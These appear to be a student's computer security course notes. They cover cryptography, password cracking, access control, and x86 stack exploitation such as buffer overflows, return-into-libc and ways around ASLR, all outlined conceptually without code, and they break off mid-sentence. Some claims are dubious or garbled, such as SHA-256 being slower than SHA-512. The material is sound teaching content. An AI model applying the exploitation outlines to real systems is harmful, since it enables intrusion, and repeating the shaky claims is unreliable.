Definitions

Computer security deals with understanding and improving the behavior of
computing infrastructures in presence of adversarial threats
A vulnerability is a flaw or weakness in a system's design, implementation, or
operation and management that could be exploited to violate the system's security
policy
The window of vulnerability is the time from when the vulnerability was introduced or
manifested in deployed software, to when access was removed, a security fix was
available/deployed, or the attacker was disabled
A zero-day vulnerability is a vulnerability unknown to the vendor
An exploit is a piece of software that exploits a vulnerability
Common Vulnerabilities and Exposures (CVE) system provides a reference-method
for publicly known vulnerabilities, run by MITRE
CVE identifiers are unique identifiers for vulnerabilities in publicly released software
packages
CVE identifiers are issued by CVE numbering authorities (CNAs)
Goals of Computer Security
Confidentiality: the property that information is not made available or disclosed to
unauthorized individuals, entities, or processes
Integrity: the property that data has not been changed, destroyed, or lost in an
unauthorized or accidental manner
Availability: the property of a system or a system resource being accessible and
usable upon demand by an authorized system entity, according to performance
specifications of the system
Authenticity: the property of being genuine and able to be verified and be trusted
Privacy: the right of an entity, acting in its own behalf, to determine the degree to
which it will interact with its environment, including the degree to which the entity is
willing to share info about itself with others
Security Examples
Secure Internet Communication: TLS (HTTPS), SSH, IPSec, PGP
WiFi Security: WEP, WPA, WPA2 (good)
Secure Storage: User knows secret key, provider does not
Secure Messaging: End-to-end encryption (provider does not learn the keys)
Forward secrecy: Device compromise does not help decrypting previous
communication
Backward secrecy: System protected from long term key compromise
Kerckhoffs's Principle

States that a crypto system must be secure even if everything about the system,
except the key, is public knowledge
Adversary knows the specification of Kg, Enc, and Dec
No security by obscurity! (hidden specifications of encryption scheme still common in
industrial settings though)
A secure encryption scheme should hide all possible partial information about the
plaintext(s), since what is useful is usage-dependent
Common Attack Settings
Unknown plaintext attack: attacker only sees ciphertexts
Known plaintext attack: attacker additionally knows some plaintext-ciphertext pairs
Chosen plaintext attack: attacker can arbitrarily choose what the plaintexts are
Semantic Security
Semantic security is achieved when the encryption reveals nothing about the
plaintext, not even whether the same message was encrypted earlier
Every time we encrypt, the cipher text looks random to a computationally
bounded adversary. To ensure this, encryption must use randomization (many
possible ciphertexts for same message)
Masking
If we bitwise-xor a random string K to any string X, the outcome C = X XOR K is
random and independent of the original X, and thus hides everything about X (*the
probability of every possible K is exactly 1/(2^n))
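The masking fact can be tried out directly. A minimal sketch, assuming the mask K is drawn uniformly with Python's `secrets` module; the helper names `xor_bytes` and `mask` are made up for illustration:

```python
import secrets

def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Bitwise XOR of two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("inputs must have the same length")
    return bytes(x ^ y for x, y in zip(a, b))

def mask(x: bytes):
    """Draw a fresh uniform K and return (K, C) with C = X XOR K."""
    k = secrets.token_bytes(len(x))
    return k, xor_bytes(x, k)

x = b"ATTACK AT DAWN"
k, c = mask(x)
# XOR-ing with the same K again removes the mask and recovers X.
assert xor_bytes(c, k) == x
```

The guarantee only holds if K is used once; reusing K for two strings X1 and X2 leaks X1 XOR X2.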
Symmetric Cryptography
Symmetric cryptography considers the setting where the sender and the receiver
share the same secret key, and want to communicate securely in presence of an
adversary
Key generation algorithm (Kg), takes no input and outputs a (random) secret
key K
Encryption algorithm (Enc), takes input the key K and the plaintext M, outputs
ciphertext C <- Enc(K,M)
Decryption algorithm (Dec), is such that: Dec(K, Enc(K,M)) = M
Mono-Alphabetic Substitution Ciphers
Key Generation: Random one-to-one mapping of each character {A,B,...,Z} ->
{A,B,...,Z}

One-to-one mapping isn't very secure because it preserves the frequencies of each
letter in the text
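The frequency problem is easy to see in code. A small sketch, assuming uppercase A-Z only; `keygen`, `encrypt`, `decrypt`, and `letter_counts` are illustrative names, and `random.Random` is used only so the demo is repeatable (it is not a cryptographic generator):

```python
import random
import string
from collections import Counter

ALPHABET = string.ascii_uppercase

def keygen(rng: random.Random) -> dict:
    """Kg: a random one-to-one mapping {A..Z} -> {A..Z}."""
    shuffled = list(ALPHABET)
    rng.shuffle(shuffled)
    return dict(zip(ALPHABET, shuffled))

def encrypt(key: dict, plaintext: str) -> str:
    """Substitute each letter; characters outside A-Z are left unchanged."""
    return "".join(key.get(ch, ch) for ch in plaintext.upper())

def decrypt(key: dict, ciphertext: str) -> str:
    inverse = {v: k for k, v in key.items()}
    return "".join(inverse.get(ch, ch) for ch in ciphertext)

def letter_counts(text: str) -> list:
    """Sorted letter counts, ignoring which letter carries which count."""
    return sorted(Counter(ch for ch in text if ch in ALPHABET).values())

key = keygen(random.Random(1))
msg = "MEET ME AT THE USUAL PLACE"
ct = encrypt(key, msg)
# The ciphertext has exactly the same frequency profile as the plaintext.
assert letter_counts(ct) == letter_counts(msg)
```

An attacker matches the most frequent ciphertext letters to the most frequent letters of the language (E, T, A, ... in English).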
Block Ciphers
A block cipher is a substitution cipher where the plaintext is made of blocks from a
very large alphabet, but with a very compact
Blocks are n-bit strings
There are (2^128)! permutations over 128-bit strings
Two examples of constructing block ciphers are DES and AES
Data Encryption Standard (DES)
(1) Split 64-bit input into L0, R0 of 32 bits each (2) Repeat round 16 times
(3) Each round applies function F using separate round keys K1...K16
derived from main key
Essentially broken (use 3DES, which uses 168-bit keys for roughly 112 bits of effective security)
Advanced Encryption Standard (AES)
For k = 128 uses 10 rounds of permute and XOR in a round key derived
from K
Current block cipher standard
Pseudorandom permutation (PRP): a block cipher (e.g., AES) under a random secret
key behaves as an ideal substitution cipher with n-bit alphabet (security goal)
As long as the adversary does not learn the key, outputs on different inputs look
like random and independent strings
Problem: Two identical 16-byte sequences are still going to be encrypted in the same
way. As such, it is still bad at encrypting images because repeated patterns remain visible.
Counter Mode Encryption (CTR)
Algorithm Enc(K,M):
Split M in blocks M[1],...,M[r] *all blocks except possibly M[r] are n-bits
Pick random IV <- {0,1}^n
C[0] <- IV
for i in range(1,r+1) do
P[i] <- Ek(IV + i)
C[i] <- M[i] XOR P[i]
return C[0],C[1],...,C[r]
Note: If M[r] shorter than n bits, then also shorten P[r] as necessary
Masking strings, P[1],...,P[r] generated upon each encryption will come from disjoint
parts of the block cipher domain (with high probability), and thus look random and
independent
Every encryption adds a new, independent mask to the plaintext, and thus (by our
previously established fact about masking) every ciphertext looks like a fresh random
string
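The CTR algorithm above can be sketched in a few lines. Assumption: the standard library has no AES, so `E` below is a stand-in for Ek built from HMAC-SHA256 truncated to one block (CTR only ever needs the forward direction of Ek). All function names are illustrative:

```python
import hashlib
import hmac
import secrets

BLOCK = 16  # n = 128 bits

def E(key: bytes, block: bytes) -> bytes:
    """Stand-in for Ek (assumption: HMAC-SHA256 truncated, NOT real AES)."""
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]

def _xor(a: bytes, b: bytes) -> bytes:
    # zip stops at the shorter input, which shortens P[r] for a short M[r].
    return bytes(x ^ y for x, y in zip(a, b))

def _pad_block(key: bytes, iv: bytes, i: int) -> bytes:
    """P[i] <- Ek(IV + i), with the addition taken modulo 2^n."""
    counter = (int.from_bytes(iv, "big") + i) % (1 << (8 * BLOCK))
    return E(key, counter.to_bytes(BLOCK, "big"))

def ctr_encrypt(key: bytes, message: bytes) -> bytes:
    iv = secrets.token_bytes(BLOCK)          # fresh random IV per encryption
    out = [iv]                               # C[0] <- IV
    blocks = [message[j:j + BLOCK] for j in range(0, len(message), BLOCK)]
    for i, m in enumerate(blocks, start=1):
        out.append(_xor(m, _pad_block(key, iv, i)))   # C[i] <- M[i] XOR P[i]
    return b"".join(out)

def ctr_decrypt(key: bytes, ciphertext: bytes) -> bytes:
    iv, body = ciphertext[:BLOCK], ciphertext[BLOCK:]
    blocks = [body[j:j + BLOCK] for j in range(0, len(body), BLOCK)]
    return b"".join(_xor(c, _pad_block(key, iv, i))
                    for i, c in enumerate(blocks, start=1))
```

Encrypting the same message twice gives two different ciphertexts because each call draws a new IV, which is what semantic security asks for.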
Cipher Block Chaining (CBC)
Popular alternative to CTR
Algorithm Enc(K,M):
Split M into blocks M[1],...,M[r] *all blocks are n-bits
Pick random IV <- {0,1}^n
C[0] <- IV
for i in range(1,r+1) do
C[i] <- Ek(M[i] XOR C[i-1])
return C[0],C[1],...,C[r]
Note: You must pad the last block M[r] in order to run this algorithm
Problem: Susceptible to the Padding Oracle Attack
Stream Ciphers
Stream ciphers generate a stream of masks
Message Authentication (Integrity)
Integrity must also be achieved for every encryption scheme
If an adversary tampers with ciphertexts sent by someone, the receiver must be able to
detect it
Message Authentication Code (MAC) is an efficient algorithm that takes a secret key
and a string of arbitrary length, and outputs an (unpredictable) short output/digest
A MAC satisfies unforgeability if it is infeasible for an adversary to output a valid
tag for a message M not previously sent by the correct sender
Using a hash function H to build a MAC is called HMAC
There is also the CBC-MAC which satisfies unforgeability if Ek is a secure PRP
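A short HMAC sketch using Python's standard `hmac` module with SHA-256 as H (the choice of SHA-256 and the names `mac` and `verify` are assumptions for illustration):

```python
import hashlib
import hmac
import secrets

def mac(key: bytes, message: bytes) -> bytes:
    """Tag for message under key, using HMAC with H = SHA-256."""
    return hmac.new(key, message, hashlib.sha256).digest()

def verify(key: bytes, message: bytes, tag: bytes) -> bool:
    """Recompute the tag and compare in constant time."""
    return hmac.compare_digest(mac(key, message), tag)

key = secrets.token_bytes(32)
tag = mac(key, b"pay 10 to bob")
assert verify(key, b"pay 10 to bob", tag)
# A tampered message no longer matches the tag.
assert not verify(key, b"pay 1000 to bob", tag)
```

The receiver needs the same secret key as the sender, so a MAC protects integrity between the two of them but proves nothing to third parties.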
Hash Functions
Hash function (H) maps arbitrary bit string to fixed length string of size m
Security goals:
Collision resistance: Cannot find M != M' such that H(M) = H(M')
Preimage resistance: given H(M) cannot find M
Second-preimage resistance: given M cannot find M' != M so that H(M') = H(M)
Example Hash Functions
MD5: m = 128 bits (broken)
SHA-1: m = 160 bits (broken)
SHA-256: m = 256 bits
SHA-3: m >= 224 bits
SHA-512
Authenticated Encryption
We can secure a channel by combining a MAC with a semantically secure encryption
scheme
Encrypt-then-MAC (EtM) is the best option (consists of two keys: one for Enc, one for
MAC)
Decryption: Given C* = C || T, first check that T is a valid tag for C using K'
If so, decrypt C, and output result
If not, output "error"
EtM is secure as long as the encryption scheme is semantically secure, and
MAC is unforgeable
Integrity: If the attacker sees C* = (C,T), and wants to change this to a valid C** =
(C', T') where C' != C, then it needs to forge the MAC (i.e. produce a new tag T'
for C')
Confidentiality: C* = C || T does not leak more information about plaintext than
C, because T is computed from C directly, and does not add extra information
about plaintext
MAC-then-Encrypt (MtE) is a bad option because you must decrypt the ciphertext
every time before checking for authentication
Susceptible to padding-oracle attack
MtE is semantically secure but doesn't ensure ciphertext integrity
If encrypting everything with a semantically secure encryption scheme,
then no information about the plaintext (and the tag) is leaked
Doesn't ensure ciphertext integrity because we are able to produce a
ciphertext different than the one we have seen, which is still valid
Ensures plaintext integrity, because even if we can create a new valid
ciphertext, it still decrypts to the same message M
Encrypt-and-MAC (E&M) is a bad option because T is computed directly from M,
which may reveal information about the original plaintext. Identical messages map
to the same MAC, so the adversary can just look at the tags and guess
information about similar previous messages to start cracking the plaintext. Thus, you can
mount a chosen-plaintext attack.
E&M is not semantically secure and doesn't ensure ciphertext integrity
MAC part of the ciphertext depends deterministically on the message,
meaning the tag doesn't change if you re-encrypt the same message
twice
Doesn't ensure ciphertext integrity because we are able to produce a
ciphertext different than the one we have seen, which is still valid
Ensures plaintext integrity, because even if we can create a new valid
ciphertext, it still decrypts to the same message M
Common solution is GCM which is essentially CTR-mode + a very lightweight MAC
(widely used in TLS, WiGig, SSH, ...)
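Encrypt-then-MAC with two keys can be sketched as follows. Assumptions: the encryption part is a toy randomized stream construction built from HMAC-SHA256 (a stand-in for a real semantically secure scheme such as AES-CTR), the MAC is HMAC-SHA256, and all function names are hypothetical:

```python
import hashlib
import hmac
import secrets

NONCE_LEN = 16
TAG_LEN = 32

def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy keystream (assumption: HMAC-SHA256 in counter mode, not AES)."""
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"),
                        hashlib.sha256).digest()
        counter += 1
    return out[:length]

def _enc(key: bytes, message: bytes) -> bytes:
    nonce = secrets.token_bytes(NONCE_LEN)
    stream = _keystream(key, nonce, len(message))
    return nonce + bytes(m ^ s for m, s in zip(message, stream))

def _dec(key: bytes, c: bytes) -> bytes:
    nonce, body = c[:NONCE_LEN], c[NONCE_LEN:]
    stream = _keystream(key, nonce, len(body))
    return bytes(b ^ s for b, s in zip(body, stream))

def etm_encrypt(k_enc: bytes, k_mac: bytes, message: bytes) -> bytes:
    c = _enc(k_enc, message)
    t = hmac.new(k_mac, c, hashlib.sha256).digest()   # tag over C, not over M
    return c + t                                      # C* = C || T

def etm_decrypt(k_enc: bytes, k_mac: bytes, c_star: bytes) -> bytes:
    if len(c_star) < NONCE_LEN + TAG_LEN:
        raise ValueError("error")
    c, t = c_star[:-TAG_LEN], c_star[-TAG_LEN:]
    expected = hmac.new(k_mac, c, hashlib.sha256).digest()
    if not hmac.compare_digest(t, expected):          # check T before decrypting
        raise ValueError("error")
    return _dec(k_enc, c)
```

Because the tag is checked before any decryption happens, a tampered ciphertext is rejected without the receiver ever touching padding or plaintext, which is why EtM does not expose a padding oracle.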
WEP
Wired Equivalent Privacy is authenticated encryption used to protect wireless
communications in the original IEEE 802.11 Wi-Fi standard
Subject to a number of flaws that allow gaining access/decrypting traffic within minutes

Padding-Oracle Attacks
Works on CBC (if not using authenticated encryption)
Uses PKCS #7 padding as the CBC padding technique
Looks at how many bytes k are missing in the last block and fills those k bytes,
each with the value k
The attack relies on having a "padding oracle" who freely responds to queries about
whether a message is correctly padded or not
Utilized calculations:
C XOR M = P (use this to find P, hit padding oracle with C until you can assume
the value of M)
C XOR P = M
Solutions:
BAD: Use CTR
BAD: Try not to leak padding oracles
GOOD: Use authenticated encryption
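The PKCS #7 rule and the yes/no answer that a padding oracle leaks can be sketched like this (16-byte blocks assumed; `pad`, `unpad`, and `has_valid_padding` are illustrative names):

```python
BLOCK = 16

def pad(data: bytes, block: int = BLOCK) -> bytes:
    """Append k bytes of value k, where k is the number of missing bytes."""
    k = block - len(data) % block   # 1..block; a full block if already aligned
    return data + bytes([k]) * k

def unpad(padded: bytes, block: int = BLOCK) -> bytes:
    """Strip PKCS #7 padding, raising ValueError if it is malformed."""
    if not padded or len(padded) % block != 0:
        raise ValueError("bad length")
    k = padded[-1]
    if k < 1 or k > block or padded[-k:] != bytes([k]) * k:
        raise ValueError("bad padding")
    return padded[:-k]

def has_valid_padding(padded: bytes) -> bool:
    """The single bit a padding oracle reveals about a decrypted message."""
    try:
        unpad(padded)
        return True
    except ValueError:
        return False

assert pad(b"YELLOW SUBMA") == b"YELLOW SUBMA" + b"\x04" * 4
assert unpad(pad(b"abc")) == b"abc"
```

In the attack, the adversary modifies ciphertext bytes and watches whether the server's equivalent of `has_valid_padding` succeeds on the decrypted result.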
Public-Key Encryption Scheme
A public-key encryption scheme consists of three algorithms Kg, Enc, and Dec
Kg takes no input and outputs a random public-key/secret-key pair (PK, SK)
Enc takes input the public key PK and the plaintext M, outputs ciphertext C <- Enc(PK, M)
Dec is such that Dec(SK, Enc(PK,M)) = M
Public Key (PK) is known to everyone but the Secret Key (SK) is only known to the
receiver
RSA Encryption
RSA Setup
p and q can be large prime numbers (e.g. around 2^2048 *referred to as 2048-bit primes)
N = pq called the modulus
Z_N* = {i in {1,...,N-1} | gcd(i,N) = 1} *consists of all integers i such that the gcd is equal to 1
gcd(i,N) is the greatest common divisor
Z_N* is closed under multiplication

N = 15, e = 3, d = 3 gives e*d mod 8 = 1, where 8 = (p-1)(q-1) for p = 3, q = 5
RSA is not a full-fledged PKE scheme because it is deterministic
If we encrypt the same message twice, we get the same ciphertext
Solution: Pad message M to be encrypted into an element, using random bits
Learning p,q from N is a factoring problem. It is really hard to do this for large N:
naive trial division, for example, takes about sqrt(N) steps
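The toy parameters N = 15, e = 3, d = 3 can be checked by hand or with a few lines of code. This is textbook RSA without padding, for illustration only; the function names are made up:

```python
from math import gcd

p, q = 3, 5
N = p * q                     # modulus, 15
phi = (p - 1) * (q - 1)       # 8
e, d = 3, 3                   # e*d = 9 = 1 mod 8

def z_star(n: int) -> list:
    """All i in {1,...,n-1} with gcd(i, n) = 1."""
    return [i for i in range(1, n) if gcd(i, n) == 1]

def rsa_enc(m: int) -> int:
    return pow(m, e, N)       # C = M^e mod N

def rsa_dec(c: int) -> int:
    return pow(c, d, N)       # M = C^d mod N

def trial_division(n: int):
    """Naive factoring: about sqrt(n) loop iterations in the worst case."""
    i = 2
    while i * i <= n:
        if n % i == 0:
            return i, n // i
        i += 1
    return None

assert (e * d) % phi == 1
assert rsa_enc(2) == 8 and rsa_dec(8) == 2
# Deterministic: the same message always gives the same ciphertext.
assert rsa_enc(7) == rsa_enc(7)
assert trial_division(N) == (3, 5)
```

For a 2048-bit modulus the loop in `trial_division` would need on the order of 2^1024 iterations, which is why factoring is considered infeasible at that size.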
Hybrid Encryption
PKE = (PKE-Kg, PKE-Enc, PKE-Dec)
AE = (AE-Kg, AE-Enc, AE-Dec)
Goal: Client and server agree on key K for AE
After agreeing on a secret key K, the client and the server can exchange messages
(very fast) using authenticated encryption
Problem: Susceptible to man-in-the-middle attacks
Man-in-the-Middle Attacks
Adversary can sit between client and server and agree individually with server and
client on two different keys
Adversary can now intercept all traffic between client and server without client and
server noticing
Public-key cryptography enables individuals to generate their own key pairs, but we
need a way to decide whether a (public) key is legitimate
Example: If we connected to Google in TLS, receive PK - how do we know
whether PK = PK_google (and not something else sent by a man-in-the-middle)
We need a mechanism that allows us to trust PKs efficiently but correctly:
certificates
If A knows that PK_B belongs to a trusted (in the eyes of A) entity B, and B knows
that PK_C belongs to a trusted (in the eyes of B) entity C, then A should also
trust C and PK_C
This validation can be achieved through digital signatures
Digital Signatures

The public-key version of a MAC


A digital signature scheme consists of three algorithms Kg, Sign, and Verify
Kg takes no input and outputs a (random) verification key/signing key pair (VK,
SK)
Sign takes input the signing key SK and the plaintext M, outputs signature S <- Sign(SK, M)
Verify is such that Verify(VK, (M, Sign(SK,M))) = valid
Unforgeability means that the adversary must not be able to generate valid S for M
not sent by the real sender, even given VK
Certifications
Certification is a business, based on trust, with some major key players
Generally, the more trustworthy the organization issuing the certificate, and the more
vetting they do, the more expensive the certificate is
Trusted Certification Authorities (CAs) issue certificates for each user of the CA by
signing the user's public key with the CA's own signing key
Authentication is one-sided, as a server doesn't know who it is talking with. This
prevents MitM attacks because the adversary cannot forge a certificate for a key for
which he/she knows the secret key
Servers also want to know who they are talking to; this type of authentication can be
implemented through the use of passwords
Having one (or a few) CAs is not feasible - we need to produce a huge number of
certificates and establishing trust is costly.
Solution: Adopt a hierarchy: the hierarchical public-key infrastructure (PKI)
Certificates come with a valid date range (browser rejects invalid certificates)
Certificates can be revoked, implemented through certificate revocation lists (CRLs),
published by CAs
Hierarchical PKIs
Browsers only need to trust root CAs
Issuing CAs issue actual certificates
CAs on higher levels issue certificates for CAs on lower levels *doesn't have to be a tree
Passwords
A password is a secret string used as a piece of information for authentication
A passphrase is often longer than a password, with the structure of a proper phrase
There are two conflicting goals when choosing passwords: we want something hard to
guess, but easy to remember
Passwords are susceptible to both online attacks and offline attacks
Passwords are stored in password files and hashing is used to hide true value of the
password (in case an adversary gains access to this file)

Online Attacks
Trying multiple passwords on the server
Online attacks are easy to mitigate because the # of trials/username/unit of time
can be reduced
Prevent leaking valid usernames via generic error messages
Offline Attacks
If a password file has been stolen then the adversary can conduct an offline attack
Offline attacks are the most common attack scenario
Attacker can compute as much as he or she wishes
Password Hashing
Password hashes are stored in password files instead of the true value of the
password
Hashing functions include MD5, SHA-256, etc.
Upon receiving a password for a user, the server checks whether entry user: H(pass)
exists in passwd file
Problem: If two users use the same password and the adversary gains access to one
password, it will have found the other. Salting must be used to fight against this. If this
isn't used then rainbow tables can be used to crack passwords
The original UNIX DES-based password hashes use the first two characters as the salt.
It supports 8-char passwords and 2-char salts.
glibc password hashes (better)
Comes in the form: $hash_algo_num$salt$hash
The hash_algo_num can be: 1 = MD5, 5 = SHA-256, 6 = SHA-512
Salt comes from [a-zA-Z0-9./], and hash is encoded with these characters too
(base 64)
SHA-256 is slower (good thing) than SHA-512. Both are better than MD5
Brute-Force Attack
Try all possible passwords in increasing length, and check if the hash matches
We can slow down a brute-force attack by making computation of hash functions more
costly. Iteration, aka key-stretching, can make computation of a password hash c times
slower by iterating the hash function c times
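Key-stretching by plain iteration can be sketched as below. SHA-256 as the hash and the name `stretched_hash` are assumptions for illustration; real systems use a dedicated construction such as PBKDF2 rather than this bare loop:

```python
import hashlib

def stretched_hash(password: bytes, c: int) -> bytes:
    """Apply SHA-256 c times in a row (c >= 1)."""
    if c < 1:
        raise ValueError("c must be at least 1")
    digest = hashlib.sha256(password).digest()
    for _ in range(c - 1):
        digest = hashlib.sha256(digest).digest()
    return digest

# Every guess in a brute-force attack now costs c hash computations.
h = stretched_hash(b"hunter2", 10_000)
```

The legitimate server pays the factor c once per login, while the attacker pays it once per guess.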
Dictionary Attacks
Attempt common passwords according to some dictionary, in decreasing frequency
of likelihood

Best attacks are a clever combination of dictionaries, brute force, and manipulations of
words in dictionary according to rules
Salting
Every time a new password is added to a password file, compute a random string
called the salt
The salt is hashed together with the password and stored alongside the final hash in the password file
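A sketch of salted password storage, here using PBKDF2-HMAC-SHA256 from Python's `hashlib` so that salting and iteration are combined. The 16-byte salt, the iteration count, and the names `new_entry` and `check` are assumptions, not the format of any real password file:

```python
import hashlib
import hmac
import secrets

def new_entry(password: str, iterations: int = 100_000):
    """Return (salt, digest) to store for a newly set password."""
    salt = secrets.token_bytes(16)            # fresh random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest

def check(password: str, salt: bytes, digest: bytes,
          iterations: int = 100_000) -> bool:
    """Recompute the hash with the stored salt and compare."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)

salt_a, hash_a = new_entry("password123")
salt_b, hash_b = new_entry("password123")
# Same password, different salts, different stored hashes.
assert hash_a != hash_b
assert check("password123", salt_a, hash_a)
```

Since every entry has its own salt, a precomputed table (such as a rainbow table) would have to be rebuilt per salt, and cracking one user's hash does not reveal other users with the same password.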
Password Files
In UNIX-based systems, passwords are stored in the /etc/shadow file
/etc/passwd and /etc/shadow are usually similar, but the actual password hash is
stored only in the latter
Multifactor Authentication
Combining multiple authentication methods for stronger security (ex. Gmail's multifactor authentication)
Password-based Cryptography
Using passwords instead of secret keys makes secrets easy to memorize and avoids
expensive secure storage of keys
A password-based key derivation function (PBKDF) is used with symmetric encryption in order
to create password-based encryption

Multi-User Systems
In general, multiple users may authenticate to access a system and they may share
resources

There needs to be multiple levels of security for this system to limit what certain users
can do over others. This is where security policies come in
Security Policies
A security policy is a statement that partitions the states of the system into a set of
authorized (or secure) states and a set of unauthorized (or non-secure) states
A secure system is a system that starts in an authorized state and cannot enter an
unauthorized state
These policies involve:
Subjects: people, users, employees, ...
Objects: files, documents, physical locations, ...
Actions: read, write, open, edit, append, ...
Mandatory Access Control (MAC)
Security decisions are made by a central policy administrator (ex. Bell-LaPadula)
Reference monitors and security kernels are system components that monitor
accesses to data for security violations. These may be in the kernel, in the hypervisor, or within
applications (Apache)
It is essentially impossible to implement a good system wide MAC because implicit
covert channels allow bypassing
Discretionary Access Control (DAC)
Users decide access to their own files
There are two common implementation paradigms
Access control lists: column stored with file (UNIX)
ACLs require authenticating user
Processes must be given permissions
Reference monitor must protect permissions setting
Delegation: process run by user inherits user's permissions
Revocation: remove user from list
Capabilities: row stored for each user (Amoeba, Eros)
Token-based approach avoids need for authentication
Tokens can be passed around
Reference monitor must manage tokens
Delegation: process can pass around token
Revocation: N/A (kinda difficult)

Unforgeable tickets given to user (think: movie ticket, house key)


Permission Roles
A group is a set of users which can simplify assignment of permissions at scale (ex.
administrator, user, guest, etc.)

Permissions are set by owner/root


Resolving permissions:
If user = owner, then owner privileges
If user in group, then group privileges
Otherwise, other (world) privileges
Process (normally) runs with permissions of user that invoked process
/etc/shadow owned by root
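The resolution rule can be sketched over a UNIX-style octal mode. The function `resolve_permissions` is hypothetical, and the sketch ignores the superuser override that real kernels apply for root:

```python
def resolve_permissions(mode: int, owner: str, group: str,
                        user: str, user_groups: set) -> str:
    """Pick exactly one permission class (owner, group, other) for user."""
    if user == owner:
        bits = (mode >> 6) & 0o7      # owner privileges
    elif group in user_groups:
        bits = (mode >> 3) & 0o7      # group privileges
    else:
        bits = mode & 0o7             # other (world) privileges
    return "".join(ch if bits & flag else "-"
                   for ch, flag in (("r", 4), ("w", 2), ("x", 1)))

# A file with mode 640, owned by alice, group staff.
assert resolve_permissions(0o640, "alice", "staff", "alice", set()) == "rw-"
assert resolve_permissions(0o640, "alice", "staff", "bob", {"staff"}) == "r--"
assert resolve_permissions(0o640, "alice", "staff", "eve", {"users"}) == "---"
```

Only the first matching class applies: an owner whose class is more restrictive than the group class does not fall through to the group bits.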
x86
CISC (complex instruction set computing) with over 100 distinct opcodes in the set
Only 8 registers of 32-bits and only 6 are general-purpose
Variable-length instructions
Little-endian architecture
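Little-endian byte order matters when writing addresses into an exploit buffer. A quick check with Python's `struct` module (the helper name `to_little_endian` is made up):

```python
import struct

def to_little_endian(value: int) -> bytes:
    """Encode a 32-bit unsigned value the way x86 stores it in memory."""
    return struct.pack("<I", value)

# The least significant byte comes first in memory.
assert to_little_endian(0xDEADBEEF) == b"\xef\xbe\xad\xde"
assert struct.unpack("<I", b"\xef\xbe\xad\xde")[0] == 0xDEADBEEF
```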
Processor Memory Layout

.text: machine code executable


.data: globally initialized variables
.bss: block started by symbol, uninitialized global variables
heap: dynamic variables (malloc)
stack: local variables and function call data
Env: environment variables and program arguments
The Stack

Holds (static) part of local storage and keeps data that doesn't fit into registers
Grows from high to low addresses
Within a function, lowest part of the stack (stack frame) is assigned to that function
%ebp (base pointer) stores the "top" of the current stack frame
%esp (stack pointer) stores the "bottom" of the stack frame
Code that writes past the end of a buffer on the stack is said to smash the stack, and can cause return from the routine
to jump to a random address
Munging EBP is when function() returns and stack corrupted because stack
frame pointed to wrong address
Munging EIP is when function() returns and jumps to address pointed to by the
EIP value saved on the stack (i.e. control-flow hijacking)
AT&T Instructions
Instruction ends with data length
Format is: opcode, src, dst
Constants preceded by $
Registers preceded by %
Register Instructions
subl: subtract from a register value
Frame Instructions

pushl: put a value on the stack
Subtracts 4 from %esp, then stores the register value at the address in %esp
popl: take a value from the stack
Loads the value at the address in %esp into a register, then adds 4 to %esp
Control Flow Instructions
jmp: sets %eip (the instruction pointer) to the jump target
call: saves the current instruction pointer to stack and jumps to the argument
value
ret: pops the stack into %eip, the instruction pointer
Stack Instructions
leave: copies %ebp into %esp, then pops the saved %ebp off the stack
Function Calls
Locals are organized into stack frames and callees exist at lower addresses than the
caller
On call:
Saves %eip so you can restore control
Save %ebp so you can restore data
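How call, the function prologue, leave, and ret move %esp, %ebp, and %eip can be followed in a tiny simulation. This is a toy model with a dictionary as memory and 4-byte slots; the class `Machine` and all addresses are invented for illustration:

```python
class Machine:
    """Toy model of the x86 stack registers (not a real emulator)."""

    def __init__(self, esp: int = 0x1000):
        self.mem = {}        # address -> 32-bit value
        self.esp = esp       # stack pointer
        self.ebp = 0         # base pointer
        self.eip = 0         # instruction pointer

    def pushl(self, value: int) -> None:
        self.esp -= 4                    # stack grows toward lower addresses
        self.mem[self.esp] = value

    def popl(self) -> int:
        value = self.mem[self.esp]
        self.esp += 4
        return value

    def call(self, target: int, return_address: int) -> None:
        self.pushl(return_address)       # save %eip so control can be restored
        self.eip = target

    def prologue(self) -> None:          # pushl %ebp ; movl %esp, %ebp
        self.pushl(self.ebp)             # save %ebp so data can be restored
        self.ebp = self.esp

    def leave(self) -> None:             # movl %ebp, %esp ; popl %ebp
        self.esp = self.ebp
        self.ebp = self.popl()

    def ret(self) -> None:
        self.eip = self.popl()

m = Machine()
m.ebp = 0x2000                           # caller's frame
m.call(target=0x400, return_address=0x104)
m.prologue()
m.esp -= 16                              # subl $16, %esp : room for locals
m.mem[m.ebp + 4] = 0x41414141            # overflow overwrites the saved %eip
m.leave()
m.ret()
assert m.eip == 0x41414141               # control-flow hijacked
```

The saved return address sits at %ebp + 4, just above the saved %ebp, so a buffer among the locals that is written past its end reaches it by moving toward higher addresses.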
Buffer Overflow/Code Injection
W ^ X, mark memory page as either writable or executable but never both
In particular: make heap and stack non-executable
System crashes upon:
EIP hits a W-page
Instruction writes into X-page
W ^ X technologies
AMD64: NX bit (No-eXecute)
IA-64: XD bit (eXecute Disabled)
ARMv6: XN bit (eXecute Never)
Common idea:
Extra bit in each page table entry
Processor refuses to execute code if bit = 1
Mark heap and stack segments as such
Page table (managed by OS) is responsible for address conversion and setting
W or X access of memory pages
You can disable this with:
mprotect(): allows processes to set permissions on memory pages
execstack: sets flag in ELF binaries on whether code is executable on
stack or not
Susceptible to return-into-libc exploits
Return-into-libc Exploits

libc is the standard C library, mapped into the address space of (almost) all processes. Without
randomization, all libc functions are marked executable at fixed addresses
system() - executes commands on the system
Overwrite EIP with address of system() function
junk2 just some filler returned to after system call
First argument to system() is ptr to "/bin/sh"
We know where /bin/sh is by setting an environment variable
Countermeasures include:
Requiring to pass first argument in %eax
ASCII armoring: making sure that libraries are at addresses that contain NULL
bytes
Address Space Layout Randomization (ASLR)
A memory-protection process for operating systems that guards against buffer-overflow
attacks by randomizing the location where system executables are loaded
into memory
More effective for 64-bit architectures
Still susceptible to:
If W^X not on, a large nop-sled with classic buffer overflow
Brute force attacks on address
Vulnerabilities used to leak address information (e.g., printf arbitrary read)
Stack Canaries

We can protect the return address from being overwritten by placing canary values on
the stack. At the end of the function, we check that the canary value is correct, if not,
fail safe
Canary value can be:
